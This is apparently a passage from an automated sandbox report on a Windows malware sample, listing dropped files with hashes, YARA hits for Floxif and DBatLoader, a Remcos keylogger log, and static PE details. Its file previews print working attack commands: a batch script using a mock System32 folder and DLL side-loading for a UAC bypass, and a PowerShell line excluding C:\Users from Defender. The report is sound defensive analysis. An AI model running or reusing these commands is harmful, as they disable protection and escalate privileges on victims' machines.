Yara Hits:	Rule: Malware_Floxif_mpsvc_dll, Description: Malware - Floxif, Source: C:\Program Files (x86)\eTDdgXlyKliyxvptonffOcjuSNyaDmlKRZHGbQGKEUWyXCTW\kbTpwNGCTopuOamSxeKXoFxnyEswVm.exe.tmp, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.T6...6...6...}...<...}.......}..."...............'......."...}...1...6...T.......7.....:.7...6.R.7.......7...Rich6...........PE..L..../.d...............#.....d....................@..........................`............@..................................;..P....p.. ............................/..p............................/..@...............P............................text...3........................... ..`.rdata...c.......d..................@..@.data........P.......2..............@....rsrc... ....p.......<..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\system\symsrv.dll

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	69337
Entropy (8bit):	7.734269834755614
Encrypted:	false
SSDEEP:	1536:YjV8y93KQpFQmPLRk7G50zy/riF12jvRyo0hQk7ZL:c8y93KQjy7G55riF1cMo03V
MD5:	7574CF2C64F35161AB1292E2F532AABF
SHA1:	14BA3FA927A06224DFE587014299E834DEF4644F
SHA-256:	DE055A89DE246E629A8694BDE18AF2B1605E4B9B493C7E4AEF669DD67ACF5085
SHA-512:	4DB19F2D8D5BC1C7BBB812D3FA9C43B80FA22140B346D2760F090B73AED8A5177EDB4BDDC647A6EBD5A2DB8565BE5A1A36A602B0D759E38540D9A584BA5896AB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_FloodFix, Description: Yara detected FloodFix, Source: C:\Program Files\Common Files\system\symsrv.dll, Author: Joe Security Rule: MALWARE_Win_FloodFix, Description: Detects FloodFix, Source: C:\Program Files\Common Files\system\symsrv.dll, Author: ditekSHen Rule: MAL_Floxif_Generic, Description: Detects Floxif Malware, Source: C:\Program Files\Common Files\system\symsrv.dll, Author: Florian Roth
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.'...I...I...I.i.E...I.$.B...I..G...I.$.C.{.I.}.B...I.p.Z...I...H..I...B...I...O...I...M...I.Rich..I.................PE..L......P...........!................................................................................................(.......L...........L...........................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................2.03.UPX!....

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Windows\SysWOW64\colorcpl.exe
File Type:	data
Category:	dropped
Size (bytes):	216
Entropy (8bit):	3.3841168718579873
Encrypted:	false
SSDEEP:	3:rmlql+cOlclNCH5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:KlHNG6H5YcIeeDAlOWAAe5q1gWAv
MD5:	2B8B8BA09B64F6AC93B2B71F0CD5A746
SHA1:	B66E9617BC2E64FEACF238BF820D0AB249C5336E
SHA-256:	7C619CC7AC5B158F6C05B8040153DF0E4B8EDCA1B168EB5F602352CD43445B65
SHA-512:	36CF0FA92AE8E90493CDDB89D74107CA4B7560502ED3C9EFA37EE27302CCBC4DF36A157325098125968C622C0579212CEA06F536F2CF68E850CACFB96520FC4F
Malicious:	true
Reputation:	unknown
Preview:	....[.2.0.2.3./.0.8./.2.3. .1.9.:.3.0.:.4.7. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\Public\Elpuxpki.url

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Elpuxpki.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	100
Entropy (8bit):	5.093758880867781
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMtXFsjIvsb7scP+:HRYFVmTWDyzuFZE7lP+
MD5:	B572EAA53E9BA50C1787118A10101FD4
SHA1:	28A64E016FF966AD2BBA60741844968636B36D4D
SHA-256:	FEC83921409B05AF5B93FE3D3BA7374AE1015DAF60D244D602F87C4FA0357BE4
SHA-512:	B0C867C07698785A12D8EA06AF0A4069016C918D0558AFD90D0C0CC8F75358FD0F20A48485F579D73954171F7D159170E2E14E7F7C284C74543D3F32458CD72A
Malicious:	false
Reputation:	unknown
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Elpuxpki.PIF"..IconIndex=30..HotKey=51..

C:\Users\Public\Libraries\Elpuxpki.PIF

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1131463
Entropy (8bit):	7.419554531680892
Encrypted:	false
SSDEEP:	24576:+9PSlSUTC5lG8L14BQG/AWgbPmEqE5pLixE7pnrEH7T:+9PUZT2d14aGoTlnp52
MD5:	533B3DF0E597C50E1129EC807FD6BBCF
SHA1:	0561FC6471CB5E2F0AA9E6B3E3FDFA9FD2586DBC
SHA-256:	8BF8B980381FD607EC9065BFBCD572973770EE77C815354A35455C10651516D5
SHA-512:	0BB3A148E72A30F4BF5AAD8F27AA8CA1F8CA2EE36E498C395A5AC8091F3BFD9ECE8CB6430881EAE79A30A077B90F3F1D565833F303017EC01EE806C819BC4CD6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Elpuxpki.PIF, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................d.............@..........................p...................@..............................,#..................................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..,#.......$..................@....tls.....................................rdata..............................@..P.reloc...l... ...n..................@..P.rsrc................<..............@..P.............p......................@..P........................................................................................................................................

C:\Users\Public\Libraries\ElpuxpkiO.bat

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	466
Entropy (8bit):	5.064740183649332
Encrypted:	false
SSDEEP:	6:pLXzU44BbzUG2cL4XBbg/T2cLZCUULT2cLZCOhGKFIs2cLZZi2cL9aXSLp6N2cLR:ljU4MvUhzGiJL6EGeWkVPS93tOf
MD5:	9E80036AABE3227DBF98B3975051A53B
SHA1:	9670AAB8897770A93293D85426B7B13DDA23A152
SHA-256:	964AAB3B72B3545FABC58A209714EBEADE739A0FEC40B33AF675D7157B9CB252
SHA-512:	107FB6B364CF92730ACA1A044F7769A1F4AED39A72F031A5004CCF09B3BEBABAC5FC88B3D0F85EB64C665404136DB13678718BAD36BEA4311F07726684ED0A03
Malicious:	false
Reputation:	unknown
Preview:	cmd.exe /c mkdir "\\?\C:\Windows " ..cmd.exe /c mkdir "\\?\C:\Windows \System32"..cmd.exe /c ECHO F\|xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y..cmd.exe /c ECHO F\|xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y..cmd.exe /c ECHO F\|xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y.."C:\Windows \System32\easinvoker.exe"..ping 127.0.0.1 -n 6 > nul..del /q "C:\Windows \System32\*"..rmdir "C:\Windows \System32"..rmdir "C:\Windows \"..exit..

C:\Users\Public\Libraries\KDECO.bat

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	4.694584085826828
Encrypted:	false
SSDEEP:	3:pLACpr5LJJLNyMhQQNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OAn:pLXrznyiMMQ75ieGgdEYlRA/An
MD5:	7E5FBD29557A68383DFB34E696964E93
SHA1:	C1F748F89B47864301255D1FB2BFED04ED0D1300
SHA-256:	4E55B1BBE2E0E099592AC57A747FA8D4EF67409901D6C64323A1B73D50E5DE67
SHA-512:	7DCB6582B03E7BF0CAB2168DC775CA6D7A15EBB097FD2CDD3445B6D35EE128386FB9AA6A548B745C32540E358B2AA4D7C78A6F59F85C32065735FC54A6A2BB6A
Malicious:	false
Reputation:	unknown
Preview:	cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit..

C:\Users\Public\Libraries\Null

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:iov:iov
MD5:	BA64D7750A2764B4A814239B16694BED
SHA1:	44173C517074791FFA5E7C49E221B73DA50D4F0D
SHA-256:	9429C669F867AEECCD34ED938BEB917D650FC5557F1C0BF1CA67466A956E6041
SHA-512:	CB45D037CA06583C8771685516313971D73C0571BBEF13D1AEB398E4E11BAF51379D878CC52DAAC107F9D1DE8F3709B3A86CFE8A42FCA7BE98159CE9D688FE7D
Malicious:	false
Reputation:	unknown
Preview:	74..

C:\Users\Public\Libraries\easinvoker.exe

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Users\Public\Libraries\netutils.dll

Download File

Process:	C:\Users\user\Desktop\0vJrK0NCd1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	111405
Entropy (8bit):	5.052109520887475
Encrypted:	false
SSDEEP:	1536:XljNHW+IID3TTy6Xt8amsy1o865jd5w8DdD05Cl7MbiRHRYQ+b:XJxW+j/N8ago865w8DdD0wRYQ+b
MD5:	8B1A7AE864B2F2A73BEFA4BE3485C6B3
SHA1:	F0448250682FC5E5C2E5A0D1EDEA52BB048D82FD
SHA-256:	29B4242225DD417C42B54B995F9DA6BBAC9DACEA35F6E8DB91BFC4E4BE74921F
SHA-512:	647394D7B55A96FEF96FBD1C1D3BE5E34EFC57F45D375BCDF4BD49E9CA9CA8D3C131D1BB73DC5A31F0BFC526189DBDB7BBC2EC7E1BB0012782E6664CD4890FF6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....z.d.P..v......!..........................<a............................. ......qS........ .................................................P............P..................\........................... ...(.......................X............................................................... .P`........P....0....... ..............@.P..............@......."..............@.P@.............P.......(..............@.0@.............`.......,..............@.0@.............p........................p.....................................@.0@........P............0..............@.0.........X............8..............@.@.........h............:..............@.`.........\............<..............@.0B/4...................>..............@.PB/19..................B..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1292
Entropy (8bit):	5.357150301903567
Encrypted:	false
SSDEEP:	24:3WPpQdo4KAxX5qRP6hTppoVZL9t3UqKuHKJRSF8PQ9uM:GPei4nqRSXufL9tkq9HaR48Y9uM
MD5:	FEE027B129F0D3E81ECADDA460E6D063
SHA1:	9BA4F2687F191ABFE0D5A692377E9F065365F4A4
SHA-256:	B4532680A7BFCA99C9353D8DEB73108FA77849CD4BE1265351D06B230A3A6236
SHA-512:	F4C995FB859644913AA9426533785D2122715D65079B864853A39754FEAF6271F3D260005C2BB742447463ACAE44F314817EF284C67C64A42673E97074E40397
Malicious:	false
Reputation:	unknown
Preview:	@...e...............................7................@..........8....................@.Z:.h...........System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<.....................N...>m..>........System.Management...@...............$TRE..&D.#.t.c%A........System.DirectoryServices4................ .v'#-N....M..d........System.Xml..4...............A.....A....'.b.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<..................ASG...M-.?.........System.Transactions.<.................hr..B.....w.O........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D.....................G..H.).7.........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhdysabz.ssh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jygeob4o.kex.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6205
Entropy (8bit):	3.7658948055088
Encrypted:	false
SSDEEP:	96:In2zRqCRN51UhkvhkvCCtbFswhHS/swhHSO:DRLxcxsn
MD5:	49389849949996BDB90C2E91B4EED2E4
SHA1:	CF2204BB87FFFE11C90735E8EA3992EB29991A49
SHA-256:	7BE1393A7C2C50E1FB0F1716FF6F7B6360277455CADA732DA4381C9B3D93842D
SHA-512:	E54A835FCDD490D53CD10E22A9E586CC93A909F2DB71D3482A06C1A61DDED1C6CB14E3204D43DDA912ED4DF45660528956BCC143497CCC4164FCE881BD59F7FF
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-....Ip.....w..2.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..W.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..W.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..W.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......W....Windows.@.......Ny..W.......Y......................~.W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..W.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......W...Programs..j.......Ny..W.......Y..............@......K..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..Wt......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RBNLKJ6D6L2MH5SJFZ5V.temp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6205
Entropy (8bit):	3.7658948055088
Encrypted:	false
SSDEEP:	96:In2zRqCRN51UhkvhkvCCtbFswhHS/swhHSO:DRLxcxsn
MD5:	49389849949996BDB90C2E91B4EED2E4
SHA1:	CF2204BB87FFFE11C90735E8EA3992EB29991A49
SHA-256:	7BE1393A7C2C50E1FB0F1716FF6F7B6360277455CADA732DA4381C9B3D93842D
SHA-512:	E54A835FCDD490D53CD10E22A9E586CC93A909F2DB71D3482A06C1A61DDED1C6CB14E3204D43DDA912ED4DF45660528956BCC143497CCC4164FCE881BD59F7FF
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-....Ip.....w..2.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..W.......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..W.......Y....................D1,.R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......Ny..W.......Y....................b5..M.i.c.r.o.s.o.f.t.....V.1......W....Windows.@.......Ny..W.......Y......................~.W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..W.......Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......W...Programs..j.......Ny..W.......Y..............@......K..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny..Wt......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

C:\Windows \System32\KDECO.bat

Download File

Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	4.694584085826828
Encrypted:	false
SSDEEP:	3:pLACpr5LJJLNyMhQQNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OAn:pLXrznyiMMQ75ieGgdEYlRA/An
MD5:	7E5FBD29557A68383DFB34E696964E93
SHA1:	C1F748F89B47864301255D1FB2BFED04ED0D1300
SHA-256:	4E55B1BBE2E0E099592AC57A747FA8D4EF67409901D6C64323A1B73D50E5DE67
SHA-512:	7DCB6582B03E7BF0CAB2168DC775CA6D7A15EBB097FD2CDD3445B6D35EE128386FB9AA6A548B745C32540E358B2AA4D7C78A6F59F85C32065735FC54A6A2BB6A
Malicious:	false
Reputation:	unknown
Preview:	cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit..

C:\Windows \System32\easinvoker.exe

Download File

Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	131648
Entropy (8bit):	5.225468064273746
Encrypted:	false
SSDEEP:	3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5:	231CE1E1D7D98B44371FFFF407D68B59
SHA1:	25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256:	30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512:	520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Windows \System32\netutils.dll

Download File

Process:	C:\Windows\SysWOW64\xcopy.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	111405
Entropy (8bit):	5.052109520887475
Encrypted:	false
SSDEEP:	1536:XljNHW+IID3TTy6Xt8amsy1o865jd5w8DdD05Cl7MbiRHRYQ+b:XJxW+j/N8ago865w8DdD0wRYQ+b
MD5:	8B1A7AE864B2F2A73BEFA4BE3485C6B3
SHA1:	F0448250682FC5E5C2E5A0D1EDEA52BB048D82FD
SHA-256:	29B4242225DD417C42B54B995F9DA6BBAC9DACEA35F6E8DB91BFC4E4BE74921F
SHA-512:	647394D7B55A96FEF96FBD1C1D3BE5E34EFC57F45D375BCDF4BD49E9CA9CA8D3C131D1BB73DC5A31F0BFC526189DBDB7BBC2EC7E1BB0012782E6664CD4890FF6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....z.d.P..v......!..........................<a............................. ......qS........ .................................................P............P..................\........................... ...(.......................X............................................................... .P`........P....0....... ..............@.P..............@......."..............@.P@.............P.......(..............@.0@.............`.......,..............@.0@.............p........................p.....................................@.0@........P............0..............@.0.........X............8..............@.@.........h............:..............@.`.........\............<..............@.0B/4...................>..............@.PB/19..................B..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	527
Entropy (8bit):	4.93002924277763
Encrypted:	false
SSDEEP:	12:PKMRJpTeTeTeTeTeT0sF7n+AFSkIrxMVlmJHaVzvv:/naD+AokItULVDv
MD5:	1E4493508EB6B3891A6134F6719B8CFF
SHA1:	5945034284D72C4F0513510A51F5667D2D14E65F
SHA-256:	5153D49A8705C8621F4DAA72287BE931D2D34346E4984EFB4B572CEDD95DA4AC
SHA-512:	5BF0B241EA0136A901EA0AA15D194ECA23B83C4C7586278097E20443A8D775F250FED7614CFDA37CB7171CE73512C4855E924E4AE35BE16150DDEC9AB8FC9649
Malicious:	false
Reputation:	unknown
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 6, Received = 6, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.419554531680892
TrID:	Win32 Executable (generic) a (10002005/4) 99.66% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	0vJrK0NCd1.exe
File size:	1'131'463 bytes
MD5:	533b3df0e597c50e1129ec807fd6bbcf
SHA1:	0561fc6471cb5e2f0aa9e6b3e3fdfa9fd2586dbc
SHA256:	8bf8b980381fd607ec9065bfbcd572973770ee77c815354a35455c10651516d5
SHA512:	0bb3a148e72a30f4bf5aad8f27aa8ca1f8ca2ee36e498c395a5ac8091f3bfd9ece8cb6430881eae79a30a077b90f3f1d565833f303017ec01ee806c819bc4cd6
SSDEEP:	24576:+9PSlSUTC5lG8L14BQG/AWgbPmEqE5pLixE7pnrEH7T:+9PUZT2d14aGoTlnp52
TLSH:	F935D016A17885BBD1E30E34F84E6394951B7E391F38384365D2BD8DBA3E681B52C783
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	71f9919286b2a1a5

Static PE Info

General

Entrypoint:	0x460464
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	eeb6f210c31e51d5b63be371278c03a3

Entrypoint Preview

Instruction
jmp 00007FF02CC25861h
mov eax, 004601C4h
call 00007FF02CBDD06Dh
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
call 00007FF02CC28975h
mov ecx, dword ptr [004EBC14h]
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045FF04h]
call 00007FF02CC28975h
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
call 00007FF02CC289E9h
call 00007FF02CBDAC90h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xed000	0x232c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf9000	0xd600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf1000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
